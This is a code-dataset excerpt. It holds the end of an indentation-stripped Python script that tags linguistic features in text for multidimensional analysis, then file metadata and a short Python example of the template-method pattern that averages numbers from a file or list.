next_word = ['','NULL']
if i>=1:
previous_word = wordList[i-1].split('_')
else:
previous_word = ['','NULL']
if i>=2:
second_previous_word = wordList[i-2].split('_')
else:
second_previous_word = ['','NULL']
if i>=3:
third_previous_word = wordList[i-3].split('_')
else:
third_previous_word = ['','NULL']
if i>=4:
fourth_previous_word = wordList[i-4].split('_')
else:
fourth_previous_word = ['','NULL']
if i>=5:
fifth_previous_word = wordList[i-5].split('_')
else:
fifth_previous_word = ['','NULL']
if i>=6:
sixth_previous_word = wordList[i-6].split('_')
else:
sixth_previous_word = ['','NULL']
#adverbial subordinators
if word[0].lower() in ["since","while","whilst","whereupon","whereas","whereby"]:
wordList[i]=wordList[i].replace(word[1],'OSUB')
word = wordList[i].split('_')
if (
(word[0].lower() == "such" and next_word[0].lower() == "that") or
(word[0].lower() == "inasmuch" and next_word[0].lower() == "as") or
(word[0].lower() == "forasmuch" and next_word[0].lower() == "as") or
(word[0].lower() == "insofar" and next_word[0].lower() == "as") or
(word[0].lower() == "insomuch" and next_word[0].lower() == "as") or
(word[0].lower() == "so" and next_word[0].lower() == "that" and any(n in second_next_word for n in ["NN","NNP","JJ"]))
):
wordList[i]=wordList[i].replace(word[1],'OSUB')
word = wordList[i].split('_')
wordList[i+1]=wordList[i+1].replace(next_word[1],"NULL")
next_word = wordList[i+1].split('_')
if ((word[0].lower() =="as") and (next_word[0].lower() in ["long","soon"]) and (second_next_word[0].lower() =="as")):
wordList[i]=wordList[i].replace(word[1],'OSUB')
word = wordList[i].split('_')
wordList[i+1]=wordList[i+1].replace(next_word[1],"NULL")
next_word = wordList[i+1].split('_')
wordList[i+2]=wordList[i+2].replace(second_next_word[1],"NULL")
second_next_word = wordList[i+2].split('_')
#predicative adjectives
if (word[0].lower() in be) and ("JJ" in next_word) and any(n in second_next_word for n in ["JJ","RB","NN","NNP"]):
wordList[i+1]=wordList[i+1].replace(next_word[1],'PRED')
next_word = wordList[i+1].split('_')
if (word[0].lower() in be) and ("RB" in next_word) and ("JJ" in second_next_word) and any(n in third_next_word for n in ["JJ","RB","NN","NNP"]):
wordList[i+2]=wordList[i+2].replace(second_next_word[1],'PRED')
second_next_word = wordList[i+2].split('_')
if (word[0].lower() in be) and ("XX0" in next_word) and ("JJ" in second_next_word) and any(n in third_next_word for n in ["JJ","RB","NN","NNP"]):
wordList[i+2]=wordList[i+2].replace(second_next_word[1],'PRED')
second_next_word = wordList[i+2].split('_')
if (word[0].lower() in be) and ("XX0" in next_word) and ("RB" in second_next_word) and ("JJ" in third_next_word) and any(n in fourth_next_word for n in ["JJ","RB","NN","NNP"]):
wordList[i+3]=wordList[i+3].replace(third_next_word[1],'PRED')
third_next_word = wordList[i+3].split('_')
if ("JJ" in word) and ("PHC" in previous_word) and ("PRED" in second_previous_word):
wordList[i]=wordList[i].replace(word[1],'PRED')
word = wordList[i].split('_')
#tags conjuncts
if (word[0].lower() in symbols and next_word[0].lower() in ["else","altogether","rather"]):
wordList[i+1]=wordList[i+1].replace(next_word[1],"CONJ")
next_word = wordList[i+1].split('_')
if word[0].lower() in conjunctives:
wordList[i]=wordList[i].replace(word[1],"CONJ")
word = wordList[i].split('_')
if ((word[0].lower()=="in" and next_word[0].lower() in ["comparison","contrast","particular","addition","conclusion","consequence","sum","summary"]) or
(word[0].lower()=="for" and next_word[0].lower() in ["example","instance"]) or
(word[0].lower()=="instead" and next_word[0].lower()=="of") or
(word[0].lower()=="by" and next_word[0].lower() in ["contrast","comparison"])):
wordList[i]=wordList[i].replace(word[1],"CONJ")
wordList[i+1]=wordList[i+1].replace(next_word[1],"NULL")
word = wordList[i].split('_')
next_word = wordList[i+1].split('_')
if((word[0].lower()=="in" and next_word[0].lower()=="any" and second_next_word[0].lower() in ["event","case"]) or
(word[0].lower()=="in" and next_word[0].lower()=="other" and second_next_word[0].lower()=="words") or
(word[0].lower()=="as" and next_word[0].lower()=="a" and second_next_word[0].lower() in ["consequence","result"]) or
(word[0].lower()=="on" and next_word[0].lower()=="the" and second_next_word[0].lower()=="contrary") ):
wordList[i]=wordList[i].replace(word[1],"CONJ")
wordList[i+1]=wordList[i+1].replace(next_word[1],"NULL")
wordList[i+2]=wordList[i+2].replace(second_next_word[1],"NULL")
word = wordList[i].split('_')
next_word = wordList[i+1].split('_')
second_next_word = wordList[i+2].split('_')
if(word[0].lower()=="on" and next_word[0].lower()=="the"and second_next_word[0].lower()=="other" and third_next_word[0].lower()=="hand"):
wordList[i]=wordList[i].replace(word[1],"CONJ")
wordList[i+1]=wordList[i+1].replace(next_word[1],"NULL")
wordList[i+2]=wordList[i+2].replace(second_next_word[1],"NULL")
wordList[i+3]=wordList[i+3].replace(third_next_word[1],"NULL")
word = wordList[i].split('_')
next_word = wordList[i+1].split('_')
second_next_word = wordList[i+2].split('_')
third_next_word = wordList[i+3].split('_')
#tags emphatics
if word[0].lower() in ["just","really","most","more"]:
wordList[i]=wordList[i].replace(word[1],"EMPH")
word = wordList[i].split('_')
if((word[0].lower() in ["real","so"] and any(n in next_word for n in ["JJ","PRED"])) or
(word[0].lower() in do and any(n in next_word for n in v))):
wordList[i]=wordList[i].replace(word[1],"EMPH")
word = wordList[i].split('_')
if((word[0].lower() == "for" and next_word[0].lower()=="sure") or
(word[0].lower()=="a" and next_word[0].lower()=="lot") or
(word[0].lower()=="such" and next_word[0].lower()=="a")):
wordList[i]=wordList[i].replace(word[1],"EMPH")
wordList[i+1]=wordList[i+1].replace(next_word[1],"NULL")
word = wordList[i].split('_')
next_word = wordList[i+1].split('_')
#tags phrasal "and" coordination
if word[0].lower()=="and":
if((("RB" in previous_word and "RB" in next_word)) or
(any(n in previous_word for n in nn) and any(n in next_word for n in nn)) or
(any(n in previous_word for n in v) and any(n in next_word for n in v)) or
(any(n in previous_word for n in ["JJ","PRED"]) and any(n in next_word for n in ["JJ","PRED"]))):
wordList[i]=wordList[i].replace(word[1],"PHC")
word = wordList[i].split('_')
#tags pro-verb do
if word[0].lower() in do:
if (all(n not in next_word for n in v) and
("XX0" not in next_word) and
(all(n not in next_word for n in ["RB","XX0"]) and all(n not in second_previous_word for n in v)) and
(all(n not in next_word for n in ["RB","XX0"]) and ("RB" not in second_next_word )and all(n not in third_next_word for n in v)) and
(previous_word[0] not in symbols) and
((previous_word[0].lower() not in wp) or (previous_word[0].lower() not in who))):
wordList[i]+="_PROD"
word = wordList[i].split('_')
#tags WH questions
if (((word[0].lower() in symbols and word[0]!=',') and (next_word[0].lower() in who) and (next_word[0].lower() not in ["however","whatever"]) and ("MD" in second_next_word)) or
((word[0].lower() in symbols and word[0]!=',') and (next_word[0].lower() in who) and (next_word[0].lower() not in ["however","whatever"]) and ((second_next_word[0].lower() in do) or (second_next_word[0].lower() in have) or (second_next_word[0].lower() in be))) or
((word[0].lower() in symbols and word[0]!=',') and (second_next_word[0].lower())in who) and (second_next_word[0].lower() not in ["however","whatever"]) and (third_next_word[0].lower() in be)):
wordList[i+1]+="_WHQU"
next_word = wordList[i+1].split('_')
#tags sentence relatives
if(word[0].lower() in symbols and next_word[0].lower()=="which"):
wordList[i+1]+="_SERE"
next_word = wordList[i+1].split('_')
#tags perfect aspects
if word[0].lower() in have:
if (any(n in next_word for n in ["VBD","VBN"]) or
(any(n in next_word for n in ["RB","XX0"]) and any(n in second_next_word for n in ["VBD","VBN"])) or
(any(n in next_word for n in ["RB","XX0"]) and any(n in second_next_word for n in["RB","XX0"]) and any(n in third_next_word for n in ["VBD","VBN"])) or
(any(n in next_word for n in ["NN","NNP","PRP"]) and any(n in second_next_word for n in ["VBD","VBN"])) or
("XX0" in next_word and any(n in second_next_word for n in["NN","NNP","PRP"]) and any(n in third_next_word for n in ["VBN","VBD"]))):
wordList[i]+="_PEAS"
word = wordList[i].split('_')
#tags passives
if word[0].lower() in be or word[0].lower() in ["have","had","has","get"]:
if((any(n in next_word for n in ["VBD","VBN"])) or
(any(n in next_word for n in ["RB","XX0"]) and any(n in second_next_word for n in ["VBD","VBN"])) or
(any(n in next_word for n in ["RB","XX0"]) and any(n in second_next_word for n in ["RB","XX0"]) and any(n in third_next_word for n in ["VBD","VBN"])) or
("XX0" in next_word and any(n in second_next_word for n in ["NN","NNP","PRP"]) and any(n in third_next_word for n in ["VBD","VBN"])) or
(any(n in next_word for n in ["NN","NNP","PRP"]) and any(n in second_next_word for n in ["VBD","VBN"]))):
wordList[i] +="_PASS"
word = wordList[i].split('_')
#tags "by passives"
if word[0].lower() in be or word[0].lower() in ["have","had","has","get"]:
if ((any(n in next_word for n in ["VBD","VBN"]) and second_next_word[0].lower() =="by") or
(any(n in next_word for n in ["RB","XX0"]) and any(n in second_next_word for n in ["VBD","VBN"]) and third_next_word[0].lower()=="by") or
(any(n in next_word for n in ["RB","XX0"]) and any(n in second_next_word for n in ["RB","XX0"]) and any(n in third_next_word for n in ["VBD","VBN"]) and fourth_next_word[0].lower()=="by") or
(any(n in next_word for n in ["NN","NNP","PRP"]) and any(n in second_next_word for n in ["VBD","VBN"]) and third_next_word[0].lower()=="by") or
("XX0" in next_word and any(n in second_next_word for n in ["NN","NNP","PRP"]) and any(n in third_next_word for n in ["VBD","VBN"]) and fourth_next_word[0].lower()=="by")):
if ("PASS" in wordList[i]):
wordList[i]=wordList[i].replace("PASS","BYPA")
else:
wordList[i]+="_BYPA"
word = wordList[i].split('_')
#tags be as main verb
if(("EX" not in second_previous_word and "EX" not in previous_word and word[0].lower() in be and any(n in next_word for n in ["CD","DT","PDT","PRPS","PRP","JJ","PRED","PIN","QUAN"])) or
("EX" not in second_previous_word and "EX" not in previous_word and word[0].lower() in be and any(n in next_word for n in ["RB","XX0"]) and any(n in second_next_word for n in ["CD","DT","PDT","PRPS","PRP","JJ","PRED","PIN","QUAN"]))):
wordList[i] +="_BEMA"
word = wordList[i].split('_')
#tags wh clauses
if (any(n in word for n in suasive) or any(n in word for n in public) or any(n in word for n in private)) and (any(n in next_word for n in wp) or any(n in next_word for n in who)) and (all(n not in second_next_word for n in do) and all(n not in second_next_word for n in be) and all(n not in second_next_word for n in have) and ('MD' not in second_next_word)):
wordList[i+1]+="_WHCL"
next_word = wordList[i+1].split('_')
#tags pied-piping relative clauses
if "PIN" in word and next_word[0].lower() in ["who","whom","whose","which"]:
wordList[i+1]+="_PIRE"
next_word = wordList[i+1].split('_')
        #tags stranded prepositions
if "PIN" in word and next_word[0].lower()!="besides" and next_word[0].lower() in [",","."]:
wordList[i] +="_STPR"
word = wordList[i].split('_')
#tags split infinitives
if ((word[0].lower()=="to" and any(n in next_word for n in ["RB","AMPLIF","DWNT"]) and next_word[0].lower() in ["just","really","most","more"] and any(n in second_next_word for n in v)) or
(word[0].lower()=="to" and any(n in next_word for n in ["RB","AMPLIF","DWNT"]) and next_word[0].lower() in ["just","really","most","more"] and any(n in second_next_word for n in ["RB","AMPLIF","DOWNTON"]) and any(n in third_next_word for n in v))):
wordList[i] +="_SPIN"
word = wordList[i].split('_')
#tags split auxiliaries
if(((word[0].lower() in do or word[0].lower() in have or word[0].lower() in be or "MD" in word) and (any(n in next_word for n in ["RB","AMPLIF","DOWNTON"]) or (next_word[0].lower() in ["just","really","most","more"])) and any(n in second_next_word for n in v)) or
((word[0].lower() in do or word[0].lower() in have or word[0].lower() in be or "MD" in word) and (any(n in next_word for n in ["RB","AMPLIF","DOWNTON"]) or (next_word[0].lower() in ["just","really","most","more"])) and ("RB" in second_next_word) and any(n in third_next_word for n in v))):
wordList[i] +="_SPAU"
word = wordList[i].split('_')
#tags synthetic negation
if((word[0].lower()=="no" and any(n in next_word for n in ["JJ","PRED","NN","NNP"])) or
word[0].lower() =="neither" or
word[0].lower() =="nor"):
wordList[i] = wordList[i].replace(word[1],"SYNE")
word = wordList[i].split('_')
#tags time adverbials
if(word[0].lower() in timeABV):
wordList[i] = wordList[i].replace(word[1],"TIME")
word = wordList[i].split('_')
if(word[0].lower()=="soon" and next_word[0].lower()=="as"):
wordList[i] = wordList[i].replace(word[1],"TIME")
word = wordList[i].split('_')
#tags place adverbials
if word[0].lower() in placeABV and "NNP" not in word:
wordList[i] = wordList[i].replace(word[1],"PLACE")
word = wordList[i].split('_')
#tags 'that' verb complement
if((previous_word[0].lower() in ["and","nor","but","or","also"] or previous_word[0] in symbols )and word[0].lower()=="that" and (next_word[0].lower()=="there" or any(n in next_word for n in ["DT","QUAN","CD","PRP","NNS","NNP"])) or
((previous_word[0].lower() in public or previous_word[0].lower() in private or previous_word[0].lower() in suasive or (previous_word[0].lower() in ["seem","seems","seemed","seeming","appear","appears","appeared","appearing"] and any(n in previous_word for n in v))) and word[0].lower()=="that" and (next_word[0].lower() in do or next_word[0].lower() in be or next_word[0].lower() in have) or any(n in next_word for n in v) or "MD" in next_word or next_word[0].lower()=="and") or
((fourth_previous_word[0] in public or fourth_previous_word[0] in private or fourth_previous_word[0] in suasive) and "PIN" in third_previous_word and any(n in second_previous_word for n in nn) and any(n in previous_word for n in nn) and word[0].lower() =="that") or
((fifth_previous_word[0] in public or fifth_previous_word[0] in private or fifth_previous_word[0] in suasive ) and "PIN" in fourth_previous_word and any(n in third_previous_word for n in nn) and any(n in second_previous_word for n in nn) and any(n in previous_word for n in nn) and word[0].lower() =="that") or
((sixth_previous_word[0] in public or sixth_previous_word[0] in private or sixth_previous_word[0] in suasive ) and "PIN" in fifth_previous_word and any(n in fourth_previous_word for n in nn) and any(n in third_previous_word for n in nn) and any(n in second_previous_word for n in nn) and any(n in previous_word for n in nn) and word[0].lower() =="that")):
if(word[0].lower()=="that"):
wordList[i] = wordList[i].replace(word[1],"THVC")
word = wordList[i].split('_')
        #tags 'that' adjective complements
if (any(n in previous_word for n in ["JJ","PRED"]) and word[0].lower()=="that"):
wordList[i] = wordList[i].replace(word[1],"THAC")
word = wordList[i].split('_')
#tags present participial clauses
if previous_word[0] in symbols and "VBG" in word and (any(n in next_word for n in ["PIN","DT","QUAN","CD","WPs","PRP","RB"]) or next_word[0].lower() in wp or next_word[0].lower() in who):
wordList[i] += "_PRESP"
word = wordList[i].split('_')
#tags past participial clauses
if previous_word[0] in symbols and "VBN" in word and any(n in next_word for n in ["PIN","RB"]):
wordList[i] += "_PASTP"
word = wordList[i].split('_')
#tags past participial WHIZ deletion relatives
if (any(n in wordList[i-1] for n in nn) or ("QUPR" in previous_word)) and ("VBN" in word) and (any(n in next_word for n in ["PIN","RB"]) or (next_word[0].lower() in be)):
wordList[i] += "_WZPAST"
word = wordList[i].split('_')
#tags present participial WHIZ deletion relatives
if any(n in previous_word for n in nn) and "VBG" in word:
wordList[i] += "_WZPRES"
word = wordList[i].split('_')
#tags "that" relative clauses on subject position
if ((any(n in previous_word for n in nn) and (word[0].lower()=="that") and (any(n in next_word for n in v) or "MD" in next_word or next_word[0].lower() in do or next_word[0].lower() in be or next_word[0].lower() in have)) or
(any(n in previous_word for n in nn) and (word[0].lower()=="that") and any(n in next_word for n in ["RB","XX0"]) and (any(n in second_next_word for n in v) or "MD" in second_next_word or second_next_word[0].lower() in do or second_next_word[0].lower() in be or second_next_word[0].lower() in have)) or
(any(n in previous_word for n in nn) and (word[0].lower()=="that") and any(n in next_word for n in ["RB","XX0"]) and any(n in second_next_word for n in ["RB","XX0"]) and (any(n in third_next_word for n in v) or "MD" in third_next_word or third_next_word[0].lower() in do or third_next_word[0].lower() in be or third_next_word[0].lower() in have))):
wordList[i] = wordList[i].replace(word[1],"TSUB")
word = wordList[i].split('_')
#tags "that" relative clauses on object positionW
if((any(n in previous_word for n in nn) and (word[0].lower() =="that") and (next_word[0].lower() in ["it","i","we","he","she","they"] or any(n in next_word for n in ["DT","QUAN","CD","JJ","NNS","NNP","PRPS"])))or
(any(n in previous_word for n in nn) and (word[0].lower()=="that") and any(n in next_word for n in nn) and "POS" in second_next_word)):
wordList[i] = wordList[i].replace(word[1],"TOBJ")
word = wordList[i].split('_')
#tags WH relative clauses on subject position
if((all(n not in third_previous_word[0].lower() for n in narrative) and any(n in previous_word for n in nn) and (word[0].lower() in wp) and ((next_word[0].lower() in do) or (next_word[0].lower() in be) or (next_word[0].lower() in have) or any(n in next_word for n in v) or ("MD" in next_word))) or
(all(n not in third_previous_word[0].lower() for n in narrative) and any(n in previous_word for n in nn) and (word[0].lower() in wp) and any(n in next_word for n in ["RB","XX0"]) and(second_next_word[0].lower() in do or second_next_word[0].lower() in be or second_next_word[0].lower() in have or any(n in second_next_word for n in v) or "MD" in second_next_word)) or
(all(n not in third_previous_word[0].lower() for n in narrative) and any(n in previous_word for n in nn) and (word[0].lower() in wp) and any(n in next_word for n in ["RB","XX0"]) and any(n in second_next_word for n in ["RB","XX0"]) and (third_next_word[0].lower() in do or third_next_word[0].lower() in be or third_next_word[0].lower() in have or any(n in third_next_word for n in v) or "MD" in third_next_word))):
wordList[i] +="_WHSUB"
word = wordList[i].split('_')
#tags WH relative clauses on object position
if(all(n not in third_previous_word[0].lower() for n in narrative) and any(n in previous_word for n in nn) and (word[0].lower() in wp) and ((next_word[0].lower() not in do) and (next_word[0].lower() not in be) and (next_word[0].lower() not in have) and all(n not in next_word for n in v) and all(n not in next_word for n in ["MD","RB","XX0"]))):
wordList[i] += "_WHOBJ"
word = wordList[i].split('_')
#tags hedges
if word[0].lower()=="maybe":
wordList[i]= wordList[i].replace(word[1],"HDG")
word = wordList[i].split('_')
if((word[0].lower()=="at" and next_word[0].lower()=="about") or
(word[0].lower()=="something" and next_word[0].lower()=="like")):
wordList[i]= wordList[i].replace(word[1],"HDG")
wordList[i+1]= next_word[0].lower()+"_NULL"
word = wordList[i].split('_')
next_word = wordList[i+1].split('_')
if word[0].lower()=="more" and next_word[0].lower()=="or" and second_next_word[0].lower()=="less":
wordList[i]= wordList[i].replace(word[1],"HDG")
wordList[i+1]= next_word[0].lower()+"_NULL"
wordList[i+2]= second_next_word[0].lower()+"_NULL"
word = wordList[i].split('_')
next_word = wordList[i+1].split('_')
second_next_word = wordList[i+2].split('_')
if (((any(n in second_previous_word for n in ["DT","QUAN","CD","JJ","PRED","PRPS"]) or second_previous_word[0].lower() in who) and previous_word[0].lower()=="sort" and word[0].lower()=="of")or
((any(n in second_previous_word for n in ["DT","QUAN","CD","JJ","PRED","PRPS"]) or second_previous_word[0].lower() in who) and previous_word[0].lower()=="kind" and word[0].lower()=="of")):
wordList[i]= wordList[i].replace(word[1],"HDG")
wordList[i-1]= previous_word[0].lower()+"_NULL"
word = wordList[i].split('_')
previous_word = wordList[i-1].split('_')
#tags discourse particles
if (previous_word[0] in symbols) and (word[0].lower() in ["well","now","anyhow","anyways"]):
wordList[i] =wordList[i].replace(word[1],"DPAR")
word = wordList[i].split('_')
for i in range(len(wordList)):
word = wordList[i].split('_')
if i<len(wordList)-1:
next_word = wordList[i+1].split('_')
else:
next_word = ['','NULL']
#tags demonstrative pronouns
if (((word[0].lower() in ["that","this","these","those"]) and ("NULL" not in word) and ((next_word[0].lower() in do) or (next_word[0].lower() in be) or (next_word[0].lower() in have) or (next_word[0].lower() in wp) or any(n in next_word for n in v) or( "MD" in next_word) or (next_word[0].lower()=="and") or (next_word[0] in symbols)) and all(n not in word for n in ["TOBJ","TSUB","THAC","THVC"])) or
((word[0].lower()=="that") and (next_word[0].lower() in ["'s","is"]))):
wordList[i] = wordList[i].replace(word[1],"DEMP")
word = wordList[i].split('_')
for i in range(len(wordList)):
word = wordList[i].split('_')
if i<len(wordList)-1:
next_word = wordList[i+1].split('_')
else:
next_word = ['','NULL']
#tags demonstratives
if word[0].lower() in ["that","this","these","those"] and all(n not in word for n in ["DEMP","TOBJ","TSUB","THAC","THVC","NULL"]):
wordList[i] = wordList[i].replace(word[1],"DEMO")
word = wordList[i].split('_')
for i in range(len(wordList)):
word = wordList[i].split('_')
if i<len(wordList)-4:
fourth_next_word = wordList[i+4].split('_')
else:
fourth_next_word = ['','NULL']
if i<len(wordList)-3:
third_next_word = wordList[i+3].split('_')
else:
third_next_word = ['','NULL']
if i<len(wordList)-2:
second_next_word = wordList[i+2].split('_')
else:
second_next_word = ['','NULL']
if i<len(wordList)-1:
next_word = wordList[i+1].split('_')
else:
next_word = ['','NULL']
#tags subordinator-that deletion
if (((word[0].lower() in public or word[0].lower() in private or word[0].lower() in suasive) and (next_word[0].lower() in ["i","we","she","he","they"] or "DEMP" in next_word)) or
((word[0].lower() in public or word[0].lower() in private or word[0].lower() in suasive) and (["PRP"] in next_word or any(n in next_word for n in nn)) and (second_next_word[0].lower() in do or second_next_word[0].lower() in have or second_next_word[0].lower() in be or any(n in second_next_word for n in v) or "MD" in second_next_word)) or
((word[0].lower() in public or word[0].lower() in private or word[0].lower() in suasive) and any(n in next_word for n in ["JJ","PRED","RB","DT","QUAN","CD","PRPS"]) and any(n in second_next_word for n in nn) and (third_next_word[0].lower() in do or third_next_word[0].lower() in have or third_next_word[0].lower() in be or any(n in third_next_word for n in v) or "MD" in third_next_word)) or
((word[0].lower() in public or word[0].lower() in private or word[0].lower() in suasive) and any(n in next_word for n in ["JJ","PRED","RB","DT","QUAN","CD","PRPS"]) and any(n in second_next_word for n in ["JJ","PRED"]) and any(n in third_next_word for n in nn) and (fourth_next_word[0].lower() in do or fourth_next_word[0].lower() in have or fourth_next_word[0].lower() in be or any(n in fourth_next_word for n in v) or "MD" in fourth_next_word))):
wordList[i] += "_THATD"
word = wordList[i].split('_')
for i in range(len(wordList)):
word = wordList[i].split('_')
if i<len(wordList)-1:
next_word = wordList[i+1].split('_')
else:
next_word = ['','NULL']
#tags independent clause coordination
if (((previous_word[0]==",") and ("and" in word) and (any(n in next_word for n in ["it","so","then","you","u","we","he","she","they"]) or ("DEMP" in next_word))) or
((previous_word[0]==",") and ("and" in word) and (next_word[0].lower()=="there") and any(n in second_next_word for n in be)) or
((previous_word[0] in symbols) and ("and" in word)) or
(("and" in word) and (any(n in next_word for n in wp) or any(n in next_word for n in who) or any(n in next_word for n in ["because","although","though","tho","if","unless"]) or any(n in next_word for n in ["OSUB","DPAR","CONJ"])))):
wordList[i] = wordList[i].replace(word[1],"ANDC")
word = wordList[i].split('_')
for i in range(len(wordList)):
word = wordList[i].split('_')
#basic tags
if word[0].lower() in ["absolutely","altogether","completely","enormously","entirely","extremely","fully","greatly","highly","intensely","perfectly","strongly","thoroughly","totally","utterly","very"]:
wordList[i] = wordList[i].replace(word[1],"AMP")
word = wordList[i].split('_')
if word[0].lower() in ["almost","barely","hardly","merely","mildly","nearly","only","partially","partly","practically","scarcely","slightly","somewhat"]:
wordList[i] = wordList[i].replace(word[1],"DWNT")
word = wordList[i].split('_')
if ("tion"in word[0].lower() or "ment" in word[0].lower() or "ness" in word[0].lower() or "nesses" in word[0].lower() or "ity" in word[0].lower() or "ities" in word[0].lower()) and any(n in word for n in nn):
wordList[i] = wordList[i].replace(word[1],"NOMZ")
word = wordList[i].split('_')
if ("ing" in word[0].lower() and any(n in word for n in nn)) or ("ings" in word[0].lower() and any(n in word for n in nn)):
wordList[i] = wordList[i].replace(word[1],"GER")
word = wordList[i].split('_')
if any(n in word for n in nn):
wordList[i] = wordList[i].replace(word[1],"NN")
word = wordList[i].split('_')
if any(n in word for n in ["JJS","JJR"]):
wordList[i] = wordList[i].replace(word[1],"JJ")
word = wordList[i].split('_')
if any(n in word for n in ["RBS","RBR","WRB"]):
wordList[i] = wordList[i].replace(word[1],"RB")
word = wordList[i].split('_')
if any(n in word for n in ["VBP","VBZ"]):
wordList[i] = wordList[i].replace(word[1],"VPRT")
word = wordList[i].split('_')
if word[0].lower() in ["I","me","we","us","my","our","myself","ourselves"]:
wordList[i] = wordList[i].replace(word[1],"FPP1")
word = wordList[i].split('_')
if word[0].lower() in ["you","your","yourself","yourselves","thy","thee","thyself","thou"]:
wordList[i] = wordList[i].replace(word[1],"SPP2")
word = wordList[i].split('_')
if word[0].lower() in ["she","he","they","her","his","them","him","their","himself","herself","themselves"]:
wordList[i] = wordList[i].replace(word[1],"TPP3")
word = wordList[i].split('_')
if word[0].lower() in ["it","its","itself"]:
wordList[i] = wordList[i].replace(word[1],"PIT")
word = wordList[i].split('_')
if word[0].lower() in ["because"]:
wordList[i] = wordList[i].replace(word[1],"CAUS")
word = wordList[i].split('_')
if word[0].lower() in ["although","though","tho"]:
wordList[i] = wordList[i].replace(word[1],"CONC")
word = wordList[i].split('_')
if word[0].lower() in ["if","unless"]:
wordList[i] = wordList[i].replace(word[1],"COND")
word = wordList[i].split('_')
if (word[0].lower() in ["can","may","might","could"]) or ("ca" in word[0].lower() and "MD" in word):
wordList[i] = wordList[i].replace(word[1],"POMD")
word = wordList[i].split('_')
if word[0].lower() in ["ought","should","must"]:
wordList[i] = wordList[i].replace(word[1],"NEMD")
word = wordList[i].split('_')
if (word[0].lower() in ["would","shall"]) or (("will" in word[0].lower() or "ll" in word[0].lower() or "wo" in word[0].lower() or "sha" in word[0].lower() or "'d" in word[0].lower()) and "MD" not in word):
wordList[i] = wordList[i].replace(word[1],"PRMD")
word = wordList[i].split('_')
if word[0].lower() in public:
wordList[i] += "_PUBV"
word = wordList[i].split('_')
if word[0].lower() in private:
wordList[i] += "_PRIV"
word = wordList[i].split('_')
if word[0].lower() in suasive:
wordList[i] += "_SUAV"
word = wordList[i].split('_')
if word[0].lower() in ["seem","seems","seemed","seeming","appear","appears","appeared","appearing"] and any(n in word for n in v):
wordList[i] += "_SMP"
word = wordList[i].split('_')
if (word[0].lower() in ["\'ll","\'d"] or ("n\'t" in word[0].lower() and "XX0" in word) or ("\'" in word[0].lower() and any(n in word for n in v))):
wordList[i] += "_CONT"
word = wordList[i].split('_')
return wordList
def merged():
printWithTime("Merged files tagging progress started")
wordList = MergedfolderProcess()
finishedList = getFinishedFiles("merged")
for file in wordList:
if file in finishedList:
printWithTime("File: "+file+" has been processed, now moving to the next file")
continue
else:
printWithTime("Now processing file: "+file+"...")
filepath = os.path.join(directory_path,"MergedFiles")
filepath = os.path.join(filepath,file)
with open(filepath,'r') as filecontent:
data = filecontent.read().replace('\n',' ')
tagger(data,file,False)
printWithTime("Tag generation complete: "+file+"")
finishedFileRecorder = open(os.path.join(directory_path,'mList.txt'),'a')
finishedFileRecorder.write(file+"\n")
printWithTime("Tagging program finished\nPlease use tagger-count.py to generate analysis data")
return
def fragments():
printWithTime("File fragments tagging progress started")
wordList = FragmentfolderProcess()
finishedList = getFinishedFiles("fragment")
for file in wordList:
if file in finishedList:
printWithTime("File: "+file+" has been processed, now moving to the next file")
continue
else:
printWithTime("Now processing file: "+file+"...")
filepath = os.path.join(directory_path,"FileFragments")
filepath = os.path.join(filepath,file)
with open(filepath,'r') as filecontent:
data = filecontent.read().replace('\n',' ')
tagger(data,file,True)
printWithTime("Tag generation complete: "+file+"")
finishedFileRecorder = open(os.path.join(directory_path,'fList.txt'),'a')
finishedFileRecorder.write(file+"\n")
printWithTime("Tagging program finished\nPlease use tagger-count.py -f true to generate analysis data")
parser = argparse.ArgumentParser(description="MAT tagging algorithm")
parser.add_argument('-f','--fragment',type=str,default="false",help='To generate tags for merged files, set this value to false; To generate tags for file fragments, set this value to true')
parser.add_argument('-r','--restart',type=str,default="false",help='If you want to restart the program to let it process from beginning, set this value to true; otherwise, set it to false')
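# Illustrative invocations (the script filename used here is hypothetical; substitute whatever this file is saved as):
#   python tagger.py                  -> tag merged files, resuming from mList.txt
#   python tagger.py -f true -r true  -> retag all file fragments from scratch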
if not os.path.exists('Results'):
os.mkdir(os.path.join(os.getcwd(),'Results'))
os.chdir(os.path.join(os.getcwd(),'Results'))
if not os.path.exists('StanfordTags'):
os.mkdir(os.path.join(os.getcwd(),'StanfordTags'))
if not os.path.exists('ModifiedTags'):
os.mkdir(os.path.join(os.getcwd(),'ModifiedTags'))
if not os.path.exists('StanfordTagsFragment'):
os.mkdir(os.path.join(os.getcwd(),'StanfordTagsFragment'))
if not os.path.exists('ModifiedTagsFragment'):
os.mkdir(os.path.join(os.getcwd(),'ModifiedTagsFragment'))
os.chdir('..')
args = parser.parse_args()
if args.fragment == "true":
if args.restart == "true":
if os.path.exists('fList.txt'):
os.remove(os.path.join(directory_path,'fList.txt'))
fragments()
else:
if args.restart == "true":
if os.path.exists('mList.txt'):
os.remove(os.path.join(directory_path,'mList.txt'))
merged()
| 71.853022
| 3,008
| 0.580569
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 15,578
| 0.297807
|
b2a64ad7dcb9aaa41898aea3c2d8af7ef4fc0f3f
| 1,582
|
py
|
Python
|
template.py
|
deepak7376/design_pattern
|
855aa0879d478f7b2682c2ae5e92599b5c81a1c6
|
[
"MIT"
] | null | null | null |
template.py
|
deepak7376/design_pattern
|
855aa0879d478f7b2682c2ae5e92599b5c81a1c6
|
[
"MIT"
] | null | null | null |
template.py
|
deepak7376/design_pattern
|
855aa0879d478f7b2682c2ae5e92599b5c81a1c6
|
[
"MIT"
] | null | null | null |
from abc import ABC, abstractmethod
class AverageCalculator(ABC):
def average(self):
try:
num_items = 0
total_sum = 0
while self.has_next():
total_sum += self.next_item()
num_items += 1
if num_items == 0:
raise RuntimeError("Can't compute the average of zero items.")
return total_sum / num_items
finally:
self.dispose()
@abstractmethod
def has_next(self):
pass
@abstractmethod
def next_item(self):
pass
def dispose(self):
pass
class FileAverageCalculator(AverageCalculator):
def __init__(self, file):
self.file = file
self.last_line = self.file.readline()
def has_next(self):
return self.last_line != ''
def next_item(self):
result = float(self.last_line)
self.last_line = self.file.readline()
return result
def dispose(self):
self.file.close()
class MemoryAverageCalculator(AverageCalculator):
def __init__(self, lst):
self.lst = lst
self.index = 0
def has_next(self):
return self.index<len(self.lst)
def next_item(self):
result = float(self.lst[self.index])
self.index+=1
return result
def dispose(self):
pass
mac = MemoryAverageCalculator([3, 1, 4, 1, 5, 9, 2, 6, 5, 3])
print(mac.average()) # Call the template method
